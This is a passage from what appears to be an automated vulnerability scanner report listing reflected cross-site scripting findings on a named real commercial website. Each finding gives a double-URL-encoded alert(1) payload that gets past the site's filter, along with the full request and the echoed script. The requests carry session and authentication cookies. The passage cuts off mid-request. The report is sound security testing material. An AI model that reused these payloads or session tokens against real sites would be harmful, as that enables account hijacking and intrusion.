The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 963fc%2522%253balert%25281%2529%252f%252f480dff9dc81 was submitted in the REST URL parameter 1. This input was echoed as 963fc";alert(1)//480dff9dc81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc963fc%2522%253balert%25281%2529%252f%252f480dff9dc81/medialib/labware/labware-icons/eletrophoresis HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:52 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc963fc";alert(1)//480dff9dc81/medialib/labware/labware-icons/eletrophoresis","E404") ;
   </script>
...[SNIP]...

1.359. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/eletrophoresis [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/eletrophoresis

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6016%2522%253balert%25281%2529%252f%252fd1982b2049c was submitted in the REST URL parameter 2. This input was echoed as c6016";alert(1)//d1982b2049c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibc6016%2522%253balert%25281%2529%252f%252fd1982b2049c/labware/labware-icons/eletrophoresis HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:54 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibc6016";alert(1)//d1982b2049c/labware/labware-icons/eletrophoresis","E404") ;
   </script>
...[SNIP]...

1.360. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/eletrophoresis [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/eletrophoresis

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e95e%2522%253balert%25281%2529%252f%252fff6adcd7dd2 was submitted in the REST URL parameter 3. This input was echoed as 8e95e";alert(1)//ff6adcd7dd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware8e95e%2522%253balert%25281%2529%252f%252fff6adcd7dd2/labware-icons/eletrophoresis HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:55 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware8e95e";alert(1)//ff6adcd7dd2/labware-icons/eletrophoresis","E404") ;
   </script>
...[SNIP]...

1.361. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/eletrophoresis [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/eletrophoresis

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6121%2522%253balert%25281%2529%252f%252f83a06fce1c0 was submitted in the REST URL parameter 4. This input was echoed as c6121";alert(1)//83a06fce1c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-iconsc6121%2522%253balert%25281%2529%252f%252f83a06fce1c0/eletrophoresis HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:57 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-iconsc6121";alert(1)//83a06fce1c0/eletrophoresis","E404") ;
   </script>
...[SNIP]...

1.362. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/eletrophoresis [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/eletrophoresis

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1895d%2522%253balert%25281%2529%252f%252fd50e800fe73 was submitted in the REST URL parameter 5. This input was echoed as 1895d";alert(1)//d50e800fe73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/eletrophoresis1895d%2522%253balert%25281%2529%252f%252fd50e800fe73 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:59 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/eletrophoresis1895d";alert(1)//d50e800fe73","E404") ;
   </script>
...[SNIP]...

1.363. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/filtration [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/filtration

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c89b7%2522%253balert%25281%2529%252f%252f87ad3930ee4 was submitted in the REST URL parameter 1. This input was echoed as c89b7";alert(1)//87ad3930ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcc89b7%2522%253balert%25281%2529%252f%252f87ad3930ee4/medialib/labware/labware-icons/filtration HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
